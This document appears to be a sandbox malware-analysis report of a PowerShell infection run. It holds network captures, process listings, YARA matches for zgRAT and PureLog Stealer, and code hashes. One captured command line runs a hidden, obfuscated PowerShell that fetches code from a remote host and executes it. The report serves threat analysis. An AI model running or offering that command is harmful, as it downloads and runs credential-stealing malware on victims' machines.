ABDo$u/P//$JiAGA$AAAOC$P8//9$+OwAA$BCAyA$QAAKI$0AAAY$lJiDA$AAAAK$I0AAA$YlJn6$GAgAE$KKAIA$AYlJo$A7AAA$EIAcA$AAA46$/v//x$EAHxw$ojgAA$BihiA$AAGJS$YmIAQ$AAAA4$0Pv//$yhhAA$AGJSY$TACAB$AAAAf$kkCAA$R7HgI$ABDqz$+///J$iABAA$AAOKj$7//8R$BBEBK$I8AAA$YlJmk$/fv3/$/yAS
2024-09-30 16:58:30 UTC	1369	IN	Data Raw: 4f 49 54 24 2f 2f 2f 38 53 24 41 42 38 38 4b 24 49 34 41 41 41 24 5a 39 30 51 41 24 41 42 43 41 42 24 41 41 41 41 66 24 6b 6b 43 41 41 24 52 37 51 67 49 24 41 42 44 70 69 24 2f 2f 2f 2f 4a 24 69 41 41 41 41 24 41 41 4f 46 66 24 2f 2f 2f 38 53 24 41 41 4a 39 30 24 77 41 41 42 43 24 41 41 41 41 41 24 41 66 6b 6b 43 24 41 41 52 37 4f 24 77 49 41 42 44 24 6f 37 2f 2f 2f 24 2f 4a 69 41 41 24 41 41 41 41 4f 24 44 44 2f 2f 2f 24 38 41 41 42 4d 24 77 42 41 42 42 24 41 41 41 41 45 24 51 41 41 45 52 24 49 41 4b 43 6f 24 41 41 41 6f 6c 24 4a 6e 31 54 41 24 41 41 45 45 67 24 41 43 66 56 51 24 41 41 41 51 53 24 41 42 39 41 4b 24 4e 6f 42 41 41 24 5a 39 55 67 41 24 41 42 42 49 41 24 66 46 4d 41 41 24 41 51 53 41 43 24 67 57 41 41 41 24 72 45 67 42 38 24 55 77 41 41 42 Data Ascii: OIT$///8S$AB88K$I4AAA$Z90QA$ABCAB$AAAAf$kkCAA$R7QgI$ABDpi$////J$iAAAA$AAOFf$///8S$AAJ90$wAABC$AAAAA$AfkkC$AAR7O$wIABD$o7///$/JiAA$AAAAO$DD///$8AABM$wBABB$AAAAE$QAAER$IAKCo$AAAol$Jn1TA$AAEEg$ACfVQ$AAAQS$AB9AK$NoBAA$Z9UgA$ABBIA$fFMAA$AQSAC$gWAAA$rEgB8$UwAAB
2024-09-30 16:58:30 UTC	1369	IN	Data Raw: 41 49 24 41 42 43 69 6f 24 43 41 41 47 4a 24 53 59 71 45 67 24 41 44 66 64 6b 24 41 41 41 51 67 24 42 41 41 41 41 24 50 34 4f 41 51 24 41 34 73 50 2f 24 2f 2f 78 49 41 24 41 6e 33 59 41 24 41 41 45 49 41 24 55 41 41 41 41 24 34 6f 76 2f 2f 24 2f 78 49 41 48 24 31 51 6f 6a 67 24 41 41 42 6e 33 24 57 41 41 41 45 24 49 41 41 41 41 24 41 42 2b 53 51 24 49 41 42 48 73 24 4b 41 67 41 45 24 4f 59 44 2f 2f 24 2f 38 6d 49 41 24 41 41 41 41 41 24 34 64 66 2f 2f 24 2f 78 49 41 66 24 6f 63 43 41 41 24 51 6f 70 41 67 24 41 42 69 55 6d 24 66 64 63 41 41 24 41 51 67 41 41 24 41 41 41 48 35 24 4a 41 67 41 45 24 65 78 41 43 41 24 41 51 35 54 76 24 2f 2f 2f 79 59 24 67 41 51 41 41 24 41 44 68 44 2f 24 2f 2f 2f 45 67 24 42 38 31 77 41 24 41 42 42 49 41 24 4b 42 73 41 41 24 Data Ascii: AI$ABCio$CAAGJ$SYqEg$ADfdk$AAAQg$BAAAA$P4OAQ$A4sP/$//xIA$An3YA$AAEIA$UAAAA$4ov//$/xIAH$1Qojg$AABn3$WAAAE$IAAAA$AB+SQ$IABHs$KAgAE$OYD//$/8mIA$AAAAA$4df//$/xIAf$ocCAA$QopAg$ABiUm$fdcAA$AQgAA$AAAH5$JAgAE$exACA$AQ5Tv$///yY$gAQAA$ADhD/$///Eg$B81wA$ABBIA$KBsAA$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49725	162.159.135.234	443	7656	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:58:32 UTC	187	OUT	GET /?v=9&encording=json HTTP/1.1 Connection: Upgrade,Keep-Alive Upgrade: websocket Sec-WebSocket-Key: i9F8JFEBNmpiWmUy3hupXw== Sec-WebSocket-Version: 13 Host: gateway.discord.gg
2024-09-30 16:58:32 UTC	622	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 16:58:32 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Adw%2Bq4xBey8KrRUkdZwumMc4C%2Fr%2FjYjlCM8dj92YIgwxoCDjQ0vx5ywEB7jDbdrX8w5%2BIaW21p%2FAQmWWs%2BPnQH%2BCAKsTowQvIkNItjzagRsLnjJzSNXIeNNuvISMrvCoTSLu3w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8cb5c2226fac0f41-EWR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49729	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:58:38 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=17PBEYOcBeLvKsF&MD=KVfEnAfS HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-30 16:58:38 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 570ff00e-c2b8-4bc3-8bf4-10d96e5fe7fc MS-RequestId: a1720d83-8b77-4d98-b117-60495011fead MS-CV: ZlvuKnTHo0y9DiNQ.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 30 Sep 2024 16:58:37 GMT Connection: close Content-Length: 24490
2024-09-30 16:58:38 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-09-30 16:58:38 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49732	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:59:15 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=17PBEYOcBeLvKsF&MD=KVfEnAfS HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-30 16:59:16 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 29f02c4d-41ad-44c9-be22-62d008f083b5 MS-RequestId: e31538ef-5bae-47bf-8ce3-fac89858db58 MS-CV: JaZ06oYh1UeRvbeh.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 30 Sep 2024 16:59:15 GMT Connection: close Content-Length: 30005
2024-09-30 16:59:16 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-09-30 16:59:16 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	12:58:18
Start date:	30/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/\|Powershell
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	12:58:18
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	12:58:20
Start date:	30/09/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\PING.EXE" www.ministryof.gov.pk
Imagebase:	0x7ff7fe300000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:58:20
Start date:	30/09/2024
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\nslookup.exe" www.Elpson.com
Imagebase:	0x7ff645190000
File size:	89'600 bytes
MD5 hash:	F2E3950C1023ACF80765C918791999C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:58:20
Start date:	30/09/2024
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\nslookup.exe" www.mproton.com
Imagebase:	0x7ff645190000
File size:	89'600 bytes
MD5 hash:	F2E3950C1023ACF80765C918791999C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:58:21
Start date:	30/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404
Imagebase:	0x7ff678760000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	12:58:22
Start date:	30/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:58:22
Start date:	30/09/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1892,i,10163335198657100473,3974397654279076089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff678760000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	12:58:25
Start date:	30/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFB4ADD69AC Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4015513248.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4add0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce1f7e9f6acc16c2a6ab401c6790912e88cc8b9d6599e38ac3f23f35e3135fff
Instruction ID: 005e1bf8e49ff4d65ace40576bfb074abef46f5c7d6cfa1eed8830c8ce295f0c
Opcode Fuzzy Hash: ce1f7e9f6acc16c2a6ab401c6790912e88cc8b9d6599e38ac3f23f35e3135fff
Instruction Fuzzy Hash: 9A02F3A0B2D68A4BE759BF38C9552B57BD5EF95304F2400F9D88DCB2C3DD1DA8428392

Function 00007FFB4AEA0139 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4016162238.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4aea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26b0cfe25520885aa116bb36696f672c809ce8ef07cae51fa223661080afb441
Instruction ID: 89186011ac8e135d56b82b1a26e07a9ae720bfc609ebaca7b773fd1037d6561d
Opcode Fuzzy Hash: 26b0cfe25520885aa116bb36696f672c809ce8ef07cae51fa223661080afb441
Instruction Fuzzy Hash: 4F41D37164DB898FEB46EF28C4909A13BE5EF6B31076901EBC049CF193C929EC49C751

Function 00007FFB4ADD4EFA Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4015513248.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4add0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9431bc09509f342be62d12746c2f03bae80494232bbb7956d41e9376d9aeb36b
Instruction ID: 9ceada59ae7f5684020ceaec4593592c9b256de14b856945832fc0c39b378935
Opcode Fuzzy Hash: 9431bc09509f342be62d12746c2f03bae80494232bbb7956d41e9376d9aeb36b
Instruction Fuzzy Hash: 3231B8A6B0DBA54FD3167B7CE8660E43FA4DF8326171941F7C4C9CA0A7C919581AC3B1

Function 00007FFB4ADD37B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4015513248.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4add0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 8820f41509ff56b215bbb5e65c405339ddca1624b15061ccc633b362891bad74
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: A401A77010CB0C8FD744EF0CE451AA6B3E0FB85320F10056DE58AC3691D736E882CB41

Analysis Process: powershell.exePID: 7656, Parent PID: 6588COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	8
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFB4ADD6E00 Relevance: 10.9, Strings: 8, Instructions: 872
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x6NR, xrefs: 00007FFB4ADDCA1A
6NR, xrefs: 00007FFB4ADDCB53
x6NR, xrefs: 00007FFB4ADDCA75
RRJ, xrefs: 00007FFB4ADDC8EE
ZL_H, xrefs: 00007FFB4ADDCA6D
x6NR, xrefs: 00007FFB4ADDC920
6NR, xrefs: 00007FFB4ADDCB38
x6NR, xrefs: 00007FFB4ADDC9A0

Memory Dump Source

Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd

Similarity

API ID:
String ID: RRJ$ZL_H$x6NR$x6NR$x6NR$x6NR$6NR$6NR
API String ID: 0-1410031789
Opcode ID: 6b0c4bbf6cc7639d03259af056affe7e458167d5ba01ff01f82b9d9ff0b3491b
Instruction ID: b58f5810b8da64bd202f1dbbcd3cc3a7a33cc7d16eaec94c63e0a6e872bc9445
Opcode Fuzzy Hash: 6b0c4bbf6cc7639d03259af056affe7e458167d5ba01ff01f82b9d9ff0b3491b
Instruction Fuzzy Hash: 434258B1B1DB8A4FE799EF78C4466B57BD1EF45310F1441FED08AC7196DE2898428780

Function 00007FFB4ADDC93B Relevance: 8.0, Strings: 6, Instructions: 473
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x6NR, xrefs: 00007FFB4ADDCA1A
x6NR, xrefs: 00007FFB4ADDCA75
6NR, xrefs: 00007FFB4ADDCB53
ZL_H, xrefs: 00007FFB4ADDCA6D
6NR, xrefs: 00007FFB4ADDCB38
x6NR, xrefs: 00007FFB4ADDC9A0

Memory Dump Source

Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd

Similarity

API ID:
String ID: ZL_H$x6NR$x6NR$x6NR$6NR$6NR
API String ID: 0-3653175083
Opcode ID: c830cc3d7a0303900f7015a8c0e2543c055cca81245aa3a095a6ba680e1a3c30
Instruction ID: e8a4c805ba53736056835b19927d0ecb55eaae90ce1ca08c3e0acaa3c27b519f
Opcode Fuzzy Hash: c830cc3d7a0303900f7015a8c0e2543c055cca81245aa3a095a6ba680e1a3c30
Instruction Fuzzy Hash: 89E125B1B1DB464FE789EF78841A2B9BBD1EF95310B1541FED04AC7296DD2C9C028780

Function 00007FFB4ADDCA35 Relevance: 5.4, Strings: 4, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x6NR, xrefs: 00007FFB4ADDCA75
6NR, xrefs: 00007FFB4ADDCB53
ZL_H, xrefs: 00007FFB4ADDCA6D
6NR, xrefs: 00007FFB4ADDCB38

Memory Dump Source

Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd

Similarity

API ID:
String ID: ZL_H$x6NR$6NR$6NR
API String ID: 0-2310312892
Opcode ID: 09f167540d58abf1201ba3bdcad9954638e83fa7e1d306348e110ce852aaaf1c
Instruction ID: 5ffb10e6e6a1efcfc264e427a05a98b3bb2bf9cccc40f6b56a473d1cb1d96b81
Opcode Fuzzy Hash: 09f167540d58abf1201ba3bdcad9954638e83fa7e1d306348e110ce852aaaf1c
Instruction Fuzzy Hash: 96B103B1B0DB464FE799AF78841A2B97BD1EF85710B1541FED04EC72A2DD2C9C428741

Function 00007FFB4ADDCA90 Relevance: 2.8, Strings: 2, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6NR, xrefs: 00007FFB4ADDCB53
6NR, xrefs: 00007FFB4ADDCB38

Memory Dump Source

Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd

Similarity

API ID:
String ID: 6NR$6NR
API String ID: 0-441463189
Opcode ID: 1540740a95a5c100fb5912310eac8401813530b78383aa741b17eb397b47558e
Instruction ID: 110ac9e4bd9b51f6fdc11656ea85ad97d8dc690a7f72e1fb0e042f30ae2aea6f
Opcode Fuzzy Hash: 1540740a95a5c100fb5912310eac8401813530b78383aa741b17eb397b47558e
Instruction Fuzzy Hash: 58A124B1B0DB464FE799AF7C842A1B97BD1EF85720B1541FED04EC72A2DD285C428741

Function 00007FFB4AEA80F5 Relevance: 6.7, Strings: 5, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0q+K, xrefs: 00007FFB4AEA8464
0q+K, xrefs: 00007FFB4AEA81DD
0q+K, xrefs: 00007FFB4AEA8348
0q+K, xrefs: 00007FFB4AEA82B3
0q+K, xrefs: 00007FFB4AEA827C

Memory Dump Source

Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd

Similarity

API ID:
String ID: 0q+K$0q+K$0q+K$0q+K$0q+K
API String ID: 0-1092807211
Opcode ID: 8a06f467d8db1d1032902d286f9bca3a6b00a909070240635b1bde5399bd7bd6
Instruction ID: be57bf102c29eb14c891688b11a8620075a5c0fd2d01da90028e99d7a1990c52
Opcode Fuzzy Hash: 8a06f467d8db1d1032902d286f9bca3a6b00a909070240635b1bde5399bd7bd6
Instruction Fuzzy Hash: D3D144B290DA898FE7A6FF78C8551B5BBE5FF56310B2801FAD45DC7083D918A806C391

Function 00007FFB4ADDD4F9 Relevance: 1.7, APIs: 1, Instructions: 244
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FFB4ADDD6CE

Memory Dump Source

Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2b416b6df07aa58923e31e3aa4907591762f6336776f114ed6d6b21d65100968
Instruction ID: 9c42fbd0692aad10f2e23b0196de4e720c6b246e6397728337230f271c23c0ab
Opcode Fuzzy Hash: 2b416b6df07aa58923e31e3aa4907591762f6336776f114ed6d6b21d65100968
Instruction Fuzzy Hash: 7C710AB1A0DB494FDB59EF6CD8466B97BE0FF55310F1442BED08AD3292DB34A8028781

Function 00007FFB4ADD45DA Relevance: 1.6, APIs: 1, Instructions: 130
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FFB4ADDD6CE

Memory Dump Source

